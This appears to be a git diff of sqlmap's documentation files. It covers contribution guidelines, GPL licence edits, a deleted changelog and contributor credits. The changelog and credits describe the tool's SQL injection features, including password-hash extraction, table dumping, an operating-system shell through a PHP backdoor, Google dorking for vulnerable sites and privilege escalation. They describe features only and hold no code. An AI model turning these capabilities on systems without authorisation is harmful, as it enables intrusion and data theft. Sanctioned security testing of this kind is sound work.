 * Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
 * If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
 * If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up.
 ## Submitting code changes
 All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).
 Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).
 Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!
 ### Guidelines
 In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
 * Each patch should make one logical change.
 * Wrap code to 76 columns when possible.
 * Avoid tabbing, use four blank spaces instead.
 * Before you put time into a non-trivial patch, it is worth discussing it on the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) or privately by [email](mailto:dev@sqlmap.org).
 * Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
 * Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.
 * Style that is too different from main branch will be ''adapted'' by the developers side.
 * Do not touch anything inside `thirdparty/` and `extra/` folders.
 ### Licensing
 By submitting code contributions to the sqlmap developers, to the mailing list, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.
--- a/doc/COPYING
+++ b/doc/COPYING
@@ -1,8 +1,73 @@
 COPYING -- Describes the terms under which sqlmap is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
 sqlmap is (C) 2006-2016 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation; Version 2 (or later) with the clarifications and
 exceptions described below. This guarantees your right to use, modify, and
 redistribute this software under certain conditions. If you wish to embed
 sqlmap technology into proprietary software, we sell alternative licenses
 (contact sales@sqlmap.org).
 Note that the GPL places important restrictions on "derived works", yet it
 does not provide a detailed definition of that term. To avoid
 misunderstandings, we interpret that term as broadly as copyright law
 allows. For example, we consider an application to constitute a "derived
 work" for the purpose of this license if it does any of the following:
 * Integrates source code from sqlmap.
 * Reads or includes sqlmap copyrighted data files, such as xml/queries.xml
 * Executes sqlmap and parses the results (as opposed to typical shell or
  execution-menu apps, which simply display raw sqlmap output and so are
  not derivative works).
 * Integrates/includes/aggregates sqlmap into a proprietary executable
  installer, such as those produced by InstallShield.
 * Links to a library or executes a program that does any of the above
 The term "sqlmap" should be taken to also include any portions or derived
 works of sqlmap. This list is not exclusive, but is meant to clarify our
 interpretation of derived works with some common examples. Our
 interpretation applies only to sqlmap - we do not speak for other people's
 GPL works.
 If you have any questions about the GPL licensing restrictions on using
 sqlmap in non-GPL works, we would be happy to help. As mentioned above,
 we also offer alternative license to integrate sqlmap into proprietary
 applications and appliances.
 If you received these files with a written license agreement or contract
 stating terms other than the terms above, then that alternative license
 agreement takes precedence over these comments.
 Source is provided to this software because we believe users have a right
 to know exactly what a program is going to do before they run it.
 Source code also allows you to fix bugs and add new features. You are
 highly encouraged to send your changes to dev@sqlmap.org for possible
 incorporation into the main distribution. By sending these changes to the
 sqlmap developers, to the mailing lists, or via Git pull request, checking
 them into the sqlmap source code repository, it is understood (unless you
 specify otherwise) that you are offering the sqlmap project the unlimited,
 non-exclusive right to reuse, modify, and relicense the code. sqlmap will
 always be available Open Source, but this is important because the
 inability to relicense code has caused devastating problems for other Free
 Software projects (such as KDE and NASM). If you wish to specify special
 license conditions of your contributions, just say so when you send them.
 This program is distributed in the hope that it will be useful, but
 WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 General Public License v2.0 for more details at
 http://www.gnu.org/licenses/gpl-2.0.html, or below
 ****************************************************************************
                    GNU GENERAL PUBLIC LICENSE
                       Version 2, June 1991
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
-                       51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.
@@ -15,7 +80,7 @@ software--to make sure the software is free for all its users.  This
 General Public License applies to most of the Free Software
 Foundation's software and to any other program whose authors commit to
 using it.  (Some other Free Software Foundation software is covered by
-the GNU Library General Public License instead.)  You can apply it to
+the GNU Lesser General Public License instead.)  You can apply it to
 your programs, too.
  When we speak of free software, we are referring to freedom, not
@@ -55,7 +120,7 @@ patent must be licensed for everyone's free use or not licensed at all.
  The precise terms and conditions for copying, distribution and
 modification follow.
-
+
                    GNU GENERAL PUBLIC LICENSE
   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
@@ -110,7 +175,7 @@ above, provided that you also meet all of these conditions:
    License.  (Exception: if the Program itself is interactive but
    does not normally print such an announcement, your work based on
    the Program is not required to print an announcement.)
-
+
 These requirements apply to the modified work as a whole.  If
 identifiable sections of that work are not derived from the Program,
 and can be reasonably considered independent and separate works in
@@ -168,7 +233,7 @@ access to copy from a designated place, then offering equivalent
 access to copy the source code from the same place counts as
 distribution of the source code, even though third parties are not
 compelled to copy the source along with the object code.
-
+
  4. You may not copy, modify, sublicense, or distribute the Program
 except as expressly provided under this License.  Any attempt
 otherwise to copy, modify, sublicense or distribute the Program is
@@ -225,7 +290,7 @@ impose that choice.
 This section is intended to make thoroughly clear what is believed to
 be a consequence of the rest of this License.
-
+
  8. If the distribution and/or use of the Program is restricted in
 certain countries either by patents or by copyrighted interfaces, the
 original copyright holder who places the Program under this License
@@ -278,63 +343,30 @@ PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
 POSSIBILITY OF SUCH DAMAGES.
                     END OF TERMS AND CONDITIONS
 	    How to Apply These Terms to Your New Programs
-  If you develop a new program, and you want it to be of the greatest
+****************************************************************************
 possible use to the public, the best way to achieve this is to make it
 free software which everyone can redistribute and change under these terms.
-  To do so, attach the following notices to the program.  It is safest
+This license does not apply to the following components:
 to attach them to the start of each source file to most effectively
 convey the exclusion of warranty; and each file should have at least
 the "copyright" line and a pointer to where the full notice is found.
-    <one line to give the program's name and a brief idea of what it does.>
+* The Ansistrm library located under thirdparty/ansistrm/.
-    Copyright (C) <year>  <name of author>
+* The Beautiful Soup library located under thirdparty/beautifulsoup/.
 * The Bottle library located under thirdparty/bottle/.
 * The Chardet library located under thirdparty/chardet/.
 * The ClientForm library located under thirdparty/clientform/.
 * The Colorama library located under thirdparty/colorama/.
 * The Fcrypt library located under thirdparty/fcrypt/.
 * The Gprof2dot library located under thirdparty/gprof2dot/.
 * The KeepAlive library located under thirdparty/keepalive/.
 * The Magic library located under thirdparty/magic/.
 * The MultipartPost library located under thirdparty/multipartpost/.
 * The Odict library located under thirdparty/odict/.
 * The Oset library located under thirdparty/oset/.
 * The PageRank library located under thirdparty/pagerank/.
 * The PrettyPrint library located under thirdparty/prettyprint/.
 * The PyDes library located under thirdparty/pydes/.
 * The SocksiPy library located under thirdparty/socks/.
 * The Termcolor library located under thirdparty/termcolor/.
 * The XDot library located under thirdparty/xdot/.
 * The icmpsh tool located under extra/icmpsh/.
-    This program is free software; you can redistribute it and/or modify
+Details for the above packages can be found in the THIRD-PARTY.md file.
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 Also add information on how to contact you by electronic and paper mail.
 If the program is interactive, make it output a short notice like this
 when it starts in an interactive mode:
    Gnomovision version 69, Copyright (C) year name of author
    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
    This is free software, and you are welcome to redistribute it
    under certain conditions; type `show c' for details.
 The hypothetical commands `show w' and `show c' should show the appropriate
 parts of the General Public License.  Of course, the commands you use may
 be called something other than `show w' and `show c'; they could even be
 mouse-clicks or menu items--whatever suits your program.
 You should also get your employer (if you work as a programmer) or your
 school, if any, to sign a "copyright disclaimer" for the program, if
 necessary.  Here is a sample; alter the names:
  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
  `Gnomovision' (which makes passes at compilers) written by James Hacker.
  <signature of Ty Coon>, 1 April 1989
  Ty Coon, President of Vice
 This General Public License does not permit incorporating your program into
 proprietary programs.  If your program is a subroutine library, you may
 consider it more useful to permit linking proprietary applications with the
 library.  If this is what you want to do, use the GNU Library General
 Public License instead of this License.
--- a/doc/ChangeLog
+++ b/doc/ChangeLog
@@ -1,323 +0,0 @@
 sqlmap (0.6.4-1) stable; urgency=low
  * Minor enhancement to support an option (--is-dba) to show if the
    current user is a database management system administrator;
  * Major bug fix to avoid tracebacks when multiple targets are specified
    and one of them is not reachable;
  * Minor bug fix to make the --postfix work even if --prefix is not
    provided;
 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Day, DD MMM 2009 10:00:00 +0000
 sqlmap (0.6.3-1) stable; urgency=low
  * Major enhancement to get list of targets to test from Burp proxy
    (http://portswigger.net/suite/) requests log file path or WebScarab
    proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
    'conversations/' folder path by providing option -l <filepath>;
  * Major enhancement to support Partial UNION query SQL injection
    technique too;
  * Major enhancement to test if the web application technology supports
    stacked queries (multiple statements) by providing option
    --stacked-test which will be then used someday also by takeover
    functionality;
  * Major enhancement to test if the injectable parameter is affected by
    a time based blind SQL injection technique by providing option
    --time-test;
  * Minor enhancement to fingerprint the web server operating system and
    the web application technology by parsing some HTTP response headers;
  * Minor enhancement to fingerprint the back-end DBMS operating system by
    parsing the DBMS banner value when -b option is provided;
  * Minor enhancement to be able to specify the number of seconds before
    timeout the connection by providing option --timeout #, default is set
    to 10 seconds and must be 3 or higher;
  * Minor enhancement to be able to specify the number of seconds to wait
    between each HTTP request by providing option --delay #;
  * Minor enhancement to be able to get the injection payload --prefix and
    --postfix from user;
  * Minor enhancement to be able to enumerate table columns and dump table
    entries, also when the database name is not provided, by using the
    current database on MySQL and Microsoft SQL Server, the 'public'
    scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
  * Minor enhancemet to support also --regexp, --excl-str and --excl-reg
    options rather than only --string when comparing HTTP responses page
    content;
  * Minor enhancement to be able to specify extra HTTP headers by providing
    option --headers. By default Accept, Accept-Language and Accept-Charset
    headers are set;
  * Minor improvement to be able to provide CU (as current user) as user
    value (-U) when enumerating users privileges or users passwords;
  * Minor improvements to sqlmap Debian package files;
  * Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
    library if available to speed up the sqlmap algorithmic operations;
  * Minor improvement to retry the HTTP request up to three times in case
    an exception is raised during the connection to the target url;
  * Major bug fix to correctly enumerate columns on Microsoft SQL Server;
  * Major bug fix so that when the user provide a SELECT statement to be
    processed with an asterisk as columns, now it also work if in the FROM
    there is no database name specified;
  * Minor bug fix to correctly dump table entries when the column is
    provided;
  * Minor bug fix to correctly handle session.error, session.timeout and
    httplib.BadStatusLine exceptions in HTTP requests;
  * Minor bug fix to correctly catch connection exceptions and notify to
    the user also if they occur within a thread;
  * Increased default output level from 0 to 1;
  * Updated documentation.
 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Thu, 18 Dec 2008 10:00:00 +0000
 sqlmap (0.6.2-1) stable; urgency=low
  * Major bug fix to correctly dump tables entries when --stop is not
    specified;
  * Major bug fix so that the users' privileges enumeration now works
    properly also on both MySQL < 5.0 and MySQL >= 5.0;
  * Major bug fix when the request is POST to also send the GET parameters
    if any have been provided;
  * Major bug fix to correctly update sqlmap to the latest stable release
    with command line --update;
  * Major bug fix so that when the expected value of a query (count
    variable) is an integer and, for some reasons, its resumed value from
    the session file is a string or a binary file, the query is executed
    again and its new output saved to the session file;
  * Minor bug fix in MySQL comment injection fingerprint technique;
  * Minor improvement to correctly enumerate tables, columns and dump
    tables entries on Oracle and on PostgreSQL when the database name is
    not 'public' schema or a system database;
  * Minor improvement to be able to dump entries on MySQL < 5.0 when
    database name, table name and column(s) are provided;
  * Updated the database management system fingerprint checks to correctly
    identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
  * More user-friendly warning messages.
 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun,  2 Nov 2008 19:00:00 +0000
 sqlmap (0.6.1-1) stable; urgency=low
  * Major bug fix to blind SQL injection bisection algorithm to handle an
    exception;
  * Added a Metasploit Framework 3 auxiliary module to run sqlmap;
  * Implemented possibility to test for and inject also on LIKE
    statements;
  * Implemented --start and --stop options to set the first and the last
    table entry to dump;
  * Added non-interactive/batch-mode (--batch) option to make it easy to
    wrap sqlmap in Metasploit and any other tool;
  * Minor enhancement to save also the length of query output in the
    session file when retrieving the query output length for ETA or for
    resume purposes;
  * Changed the order sqlmap dump table entries from column by column to
    row by row. Now it also dumps entries as they are stored in the tables,
    not forcing the entries' order alphabetically anymore;
  * Minor bug fix to correctly handle parameters' value with % character.
 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 20 Oct 2008 10:00:00 +0000
 sqlmap (0.6-1) stable; urgency=low
  * Complete code refactor and many bugs fixed;
  * Added multithreading support to set the maximum number of concurrent
    HTTP requests;
  * Implemented SQL shell (--sql-shell) functionality and fixed SQL query
    (--sql-query, before called -e) to be able to run whatever SELECT
    statement and get its output in both inband and blind SQL injection
    attack;
  * Added an option (--privileges) to retrieve DBMS users privileges, it
    also notifies if the user is a DBMS administrator;
  * Added support (-c) to read options from configuration file, an example
    of valid INI file is sqlmap.conf and support (--save) to save command
    line options on a configuration file;
  * Created a function that updates the whole sqlmap to the latest stable
    version available by running sqlmap with --update option;
  * Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.)
    installation binary packages;
  * Created sqlmap .exe (Windows) portable executable;
  * Save a lot of more information to the session file, useful when
    resuming injection on the same target to not loose time on identifying
    injection, UNION fields and back-end DBMS twice or more times;
  * Improved automatic check for parenthesis when testing and forging SQL
    query vector;
  * Now it checks for SQL injection on all GET/POST/Cookie parameters then
    it lets the user select which parameter to perform the injection on in
    case that more than one is injectable;
  * Implemented support for HTTPS requests over HTTP(S) proxy;
  * Added a check to handle NULL or not available queries output;
  * More entropy (randomStr() and randomInt() functions in
    lib/core/common.py) in inband SQL injection concatenated query and in
    AND condition checks;
  * Improved XML files structure;
  * Implemented the possibility to change the HTTP Referer header;
  * Added support to resume from session file also when running with
    inband SQL injection attack;
  * Added an option (--os-shell) to execute operating system commands if
    the back-end DBMS is MySQL, the web server has the PHP engine active
    and permits write access on a directory within the document root;
  * Added a check to assure that the provided string to match (--string)
    is within the page content;
  * Fixed various queries in XML file;
  * Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted
    the library to parse it;
  * Fixed password fetching function, mainly for Microsoft SQL Server and
    reviewed the password hashes parsing function;
  * Major bug fixed to avoid tracebacks when the testable parameter(s) is
    dynamic, but not injectable;
  * Enhanced logging system: added three more levels of verbosity to show
    also HTTP sent and received traffic;
  * Enhancement to handle Set-Cookie from target url and automatically
    re-establish the Session when it expires;
  * Added support to inject also on Set-Cookie parameters;
  * Implemented TAB completion and command history on both --sql-shell and
    --os-shell;
  * Renamed some command line options;
  * Added a conversion library;
  * Added code schema and reminders for future developments;
  * Added Copyright comment and $Id$;
  * Updated the command line layout and help messages;
  * Updated some docstrings;
  * Updated documentation files.
 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon,  1 Sep 2008 10:00:00 +0100
 sqlmap (0.5-1) stable; urgency=low
  * Added support for Oracle database management system
  * Extended inband SQL injection functionality (--union-use) to all
    other possible queries since it only worked with -e and --file on
    all DMBS plugins;
  * Added support to extract database users password hash on Microsoft
    SQL Server;
  * Added a fuzzer function with the aim to parse HTML page looking
    for standard database error messages consequently improving
    database fingerprinting;
  * Added support for SQL injection on HTTP Cookie and User-Agent headers;
  * Reviewed HTTP request library (lib/request.py) to support the
    extended inband SQL injection functionality. Splitted getValue()
    into getInband() and getBlind();
  * Major enhancements in common library and added checkForBrackets()
    method to check if the bracket(s) are needed to perform a UNION query
    SQL injection attack;
  * Implemented --dump-all functionality to dump entire DBMS data from
    all databases tables;
  * Added support to exclude DBMS system databases' when enumeration
    tables and dumping their entries (--exclude-sysdbs);
  * Implemented in Dump.dbTableValues() method the CSV file dumped data
    automatic saving in csv/ folder by default;
  * Added DB2, Informix and Sybase DBMS error messages and minor
    improvements in xml/errors.xml;
  * Major improvement in all three DBMS plugins so now sqlmap does not
    get entire databases' tables structure when all of database/table/
    column are specified to be dumped;
  * Important fixes in lib/option.py to make sqlmap properly work also
    with python 2.5 and handle the CSV dump files creation work also
    under Windows operating system, function __setCSVDir() and fixed
    also in lib/dump.py;
  * Minor enhancement in lib/injection.py to randomize the number
    requested to test the presence of a SQL injection affected parameter
    and implemented the possibilities to break (q) the for cycle when
    using the google dork option (-g);
  * Minor fix in lib/request.py to properly encode the url to request
    in case the "fixed" part of the url has blank spaces;
  * More minor layout enhancements in some libraries;
  * Renamed DMBS plugins;
  * Complete code refactoring, a lot of minor and some major fixes in
    libraries, many minor improvements;
  * Updated all documentation files.
 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun,  4 Nov 2007 20:00:00 +0100
 sqlmap (0.4-1) stable; urgency=low
  * Added DBMS fingerprint based also upon HTML error messages parsing
    defined in lib/parser.py which reads an XML file defining default
    error messages for each supported DBMS;
  * Added Microsoft SQL Server extensive DBMS fingerprint checks based
    upon accurate '@@version' parsing matching on an XML file to get also
    the exact patching level of the DBMS;
  * Added support for query ETA (Estimated Time of Arrival) real time
    calculation (--eta);
  * Added support to extract database management system users password
    hash on MySQL and PostgreSQL (--passwords);
  * Added docstrings to all functions, classes and methods, consequently
    released the sqlmap development documentation
    <http://sqlmap.sourceforge.net/dev/>;
  * Implemented Google dorking feature (-g) to take advantage of Google
    results affected by SQL injection to perform other command line
    argument on their DBMS;
  * Improved logging functionality: passed from banal 'print' to Python
    native logging library;
  * Added support for more than one parameter in '-p' command line
    option;
  * Added support for HTTP Basic and Digest authentication methods
    (--basic-auth and --digest-auth);
  * Added the command line option '--remote-dbms' to manually specify
    the remote DBMS;
  * Major improvements in union.UnionCheck() and union.UnionUse()
    functions to make it possible to exploit inband SQL injection also
    with database comment characters ('--' and '#') in UNION query
    statements;
  * Added the possibility to save the output into a file while performing
    the queries (-o OUTPUTFILE) so it is possible to stop and resume the
    same query output retrieving in a second time (--resume);
  * Added support to specify the database table column to enumerate
    (-C COL);
  * Added inband SQL injection (UNION query) support (--union-use);
  * Complete code refactoring, a lot of minor and some major fixes in
    libraries, many minor improvements;
  * Reviewed the directory tree structure;
  * Splitted lib/common.py: inband injection functionalities now are
    moved to lib/union.py;
  * Updated documentation files.
 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 15 Jun 2007 20:00:00 +0100
 sqlmap (0.3-1) stable; urgency=low
  * Added module for MS SQL Server;
  * Strongly improved MySQL dbms active fingerprint and added MySQL
    comment injection check;
  * Added PostgreSQL dbms active fingerprint;
  * Added support for string match (--string);
  * Added support for UNION check (--union-check);
  * Removed duplicated code, delegated most of features to the engine
    in common.py and option.py;
  * Added support for --data command line argument to pass the string
    for POST requests;
  * Added encodeParams() method to encode url parameters before making
    http request;
  * Many bug fixes;
  * Rewritten documentation files;
  * Complete code restyling.
 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 20 Jan 2007 20:00:00 +0100
 sqlmap (0.2-1) stable; urgency=low
  * complete refactor of entire program;
  * added TODO and THANKS files;
  * added some papers references in README file;
  * moved headers to user-agents.txt, now -f parameter specifies a file
    (user-agents.txt) and randomize the selection of User-Agent header;
  * strongly improved program plugins (mysqlmap.py and postgres.py),
    major enhancements:
    * improved active mysql fingerprint check_dbms();
    * improved enumeration functions for both databases;
    * minor changes in the unescape() functions;
  * replaced old inference algorithm with a new bisection algorithm.
  * reviewed command line parameters, now with -p it's possible to
    specify the parameter you know it's vulnerable to sql injection,
    this way the script won't perform the sql injection checks itself;
    removed the TOKEN parameter;
  * improved Common class, adding support for http proxy and http post
    method in hash_page;
  * added OptionCheck class in option.py which performs all needed checks
    on command line parameters and values;
  * added InjectionCheck class in injection.py which performs check on
    url stability, dynamics of parameters and injection on dynamic url
    parameters;
  * improved output methods in dump.py;
  * layout enhancement on main program file (sqlmap.py), adapted to call
    new option/injection classes and improvements on catching of
    exceptions.
 -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Wed, 13 Dec 2006 20:00:00 +0100
--- a/doc/FAQ.pdf
+++ b/doc/FAQ.pdf
--- a/doc/README.html
+++ b/doc/README.html
--- a/doc/README.pdf
+++ b/doc/README.pdf
--- a/doc/README.sgml
+++ b/doc/README.sgml
--- a/doc/THANKS
+++ b/doc/THANKS
@@ -1,163 +0,0 @@
 == Individuals ==
 Chip Andrews <chip@sqlsecurity.com>
    for his excellent work maintaining the SQL Server versions database
    at SQLSecurity.com and permission to implement the update feature
    taking data from his site
 Jack Butler <fattredd@hotmail.com>
    for providing me with the sqlmap site favicon
 Karl Chen <quarl@cs.berkeley.edu>
    for providing with the multithreading patch for the inference
    algorithm
 Pierre Chifflier <pollux@debian.org>
    for uploading the sqlmap 0.6.2 Debian package to the official Debian
    project repository
 Stefano Di Paola <stefano.dipaola@wisec.it>
    for suggesting good features
 Adam Faheem <faheem.adam@is.co.za>
    for reporting a few bugs
 Jim Forster <jimforster@goldenwest.com>
    for reporting a bug
 Rong-En Fan <rafan@freebsd.org>
    for commiting the sqlmap 0.5 port to the official FreeBSD project
    repository
 Giorgio Fedon <giorgio.fedon@gmail.com>
    for suggesting a speed improvement for bisection algorithm
    for reporting a bug when running against Microsoft SQL Server 2005
 Ivan Giacomelli <truemilk@insiberia.net>
    for reporting a bug
    for suggesting a minor enhancement
    for reviewing the documentation
 Davide Guerri <d.guerri@caspur.it>
    for suggesting an enhancement
 Kristian Erik Hermansen <kristian.hermansen@gmail.com>
    for reporting a bug
    for donating to sqlmap development
 Jorge Hoya <aquinadie@gmail.com>
    for suggesting a minor enhancement
 Will Holcomb <wholcomb@gmail.com>
    for his MultipartPostHandler class to handle multipart POST forms and
    permission to include it within sqlmap source code
 Luke Jahnke <luke.jahnke@gmail.com>
    for reporting a bug when running against MySQL < 5.0
 Anant Kochhar <anant.kochhar@secureyes.net>
    for providing me with feedback on the user's manual
 Nico Leidecker <nico@leidecker.info>
    for providing me with feedback on a few features
 Pavol Luptak <pavol.luptak@nethemba.com>
    for reporting a bug when injecting on a POST data parameter
 Michael Majchrowicz <mmajchrowicz@gmail.com>
    for extensively beta-testing sqlmap on various MySQL DBMS
    for providing really appreciated feedback
    for suggesting a lot of ideas and features
 Ferruh Mavituna <ferruh@mavituna.com>
    for providing me with ideas on the implementation on a couple of
    new features
 Enrico Milanese <enricomilanese@gmail.com>
    for reporting a bugs when using (-a) a single line User-Agent file
    for providing me with some ideas for the PHP backdoor
 Roberto Nemirovsky <roberto.paes@gmail.com>
    for pointing me out some enhancements
 Antonio Parata <s4tan@ictsc.it>
    for providing me with some ideas for the PHP backdoor
 Chris Patten <cpatten@sunera.com>
    for reporting a bug in the blind SQL injection bisection algorithm
 Adam Pridgen <adam.pridgen@gmail.com>
    for suggesting some features
 Alberto Revelli <r00t@northernfortress.net>
    for inspiring me to write sqlmap user's manual in SGML
    for his great Microsoft SQL Server take over tool, sqlninja,
    http://sqlninja.sourceforge.net
 Andres Riancho <andres.riancho@gmail.com>
    for beta-testing sqlmap
    for reporting a bug and suggesting some features
    for including sqlmap in his great web application audit and attack
    framework, w3af, http://w3af.sourceforge.net
 Antonio Riva <antonio.riva@gmail.com>
    for reporting a bug when running with python 2.5
 Richard Safran <allapplyhere@yahoo.com>
    for donating the sqlmap.org domain control
 Tomoyuki Sakurai <cherry@trombik.org>
    for submitting to the FreeBSD project the sqlmap 0.5 port
 Philippe A. R. Schaeffer <schaeff@compuphil.de>
    for reporting a minor bug
 Sven Schluter <sschlueter@netzwerk.cc>
    for providing with a patch for waiting a number of seconds between
    each HTTP request
 M Simkin <mlsimkin@cox.net>
    for suggesting a feature
 Jason Swan <jasoneswan@gmail.com>
    for reporting a bug when enumerating columns on Microsoft SQL Server
    for suggesting a couple of improvements
 Alessandro Tanasi <alessandro@tanasi.it>
    for extensively beta-testing sqlmap
    for suggesting many features and reporting some bugs
    for reviewing the documentation
 Efrain Torres <et@metasploit.com>
    for helping me out to improve the Metasploit Framework 3 sqlmap
    auxiliary module and for commiting it on the Metasploit official
    Subversion repository
    for his great Metasploit WMAP Framework
 Sandro Tosi <matrixhasu@gmail.com>
    for helping to create sqlmap Debian package correctly
 Bedirhan Urgun <bedirhanurgun@gmail.com>
    for reporting a few bugs
    for suggesting some features and improvements
    for benchmarking sqlmap in the context of his SQL injection
    benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
 Kyprianos Vassilopoulos <kyprianos.vasilopoulos@gmail.com>
    for reporting an unhandled connection exception
 fufuh <fufuh@users.sourceforge.net>
    for reporting a bug when running on Windows
 mariano <marianoso@gmail.com>
    for reporting a bug
 Sylphid <sylphid.su@sti.com.tw>
    for suggesting some features
 == Organizations ==
 OWASP Board <http://www.owasp.org>
    for sponsoring part of the sqlmap development in the context of OWASP
    Spring of Code 2007
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -0,0 +1,799 @@
 # Individuals
 Andres Tarasco Acuna, <atarasco(at)gmail.com>
 * for suggesting a feature
 Santiago Accurso, <saccurso(at)skygear.com.ar>
 * for reporting a bug
 Syed Afzal, <syed(at)syedafzal.in>
 * for contributing a WAF script varnish.py
 Zaki Akhmad, <zakiakhmad(at)gmail.com>
 * for suggesting a couple of features
 Olu Akindeinde, <seyi.akin(at)gmail.com>
 * for reporting a couple of bugs
 David Alvarez, <david.alvarez.s(at)gmail.com>
 * for reporting a bug
 Sergio Alves, <sergioalexandre.alves(at)gmail.com>
 * for reporting a bug
 Thomas Anderson, <darkc0de(at)live.com.ph>
 * for reporting a bug
 Chip Andrews, <chip(at)sqlsecurity.com>
 * for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site
 Smith Andy, <teh.one(at)hotmail.com>
 * for suggesting a feature
 Otavio Augusto, <otavioarj(at)gmail.com>
 * for reporting a minor bug
 Simon Baker, <simonb(at)sec-1.com>
 * for reporting some bugs
 Ryan Barnett, <RBarnett(at)trustwave.com>
 * for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html
 Emiliano Bazaes, <emiliano(at)7espejos.com>
 * for reporting a minor bug
 Daniele Bellucci, <daniele.bellucci(at)gmail.com>
 * for starting sqlmap project and developing it between July and August 2006
 Sebastian Bittig, <s.bittig(at)r-tec.net> and the rest of the team at r-tec IT Systeme GmbH
 * for contributing the DB2 support initial patch: fingerprint and enumeration
 Anthony Boynes, <aboynes(at)gmail.com>
 * for reporting several bugs
 Marcelo Toscani Brandao
 * for reporting a bug
 Velky Brat, <velkybrat(at)gmail.com>
 * for suggesting a minor enhancement to the bisection algorithm
 James Briggs, <james.briggs(at)ngssecure.com>
 * for suggesting a minor enhancement
 Gianluca Brindisi, <g(at)brindi.si>
 * for reporting a couple of bugs
 Jack Butler, <fattredd(at)hotmail.com>
 * for contributing the sqlmap site favicon
 Ulisses Castro, <uss.thebug(at)gmail.com>
 * for reporting a bug
 Roberto Castrogiovanni, <castrogiovanni.roberto(at)gmail.com>
 * for reporting a minor bug
 Cesar Cerrudo, <cesar(at)argeniss.com>
 * for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf
 Karl Chen, <quarl(at)cs.berkeley.edu>
 * for contributing the initial multi-threading patch for the inference algorithm
 Y P Chien, <ypchien(at)cox.net>
 * for reporting a minor bug
 Pierre Chifflier, <pollux(at)debian.org> and Mark Hymers, <ftpmaster(at)debian.org>
 * for uploading and accepting the sqlmap Debian package to the official Debian project repository
 Hysia Chow <hysia(at)icloud.com>
 * for contributing a couple of WAF scripts
 Chris Clements, <cclements(at)flatearth.net>
 * for reporting a couple of bugs
 John Cobb, <johnc(at)nobytes.com>
 * for reporting a minor bug
 Andreas Constantinides, <megahz(at)megahz.org>
 * for reporting a minor bug
 Andre Costa, <andre.investorsclub(at)gmail.com>
 * for reporting a minor bug
 * for suggesting a minor enhancement
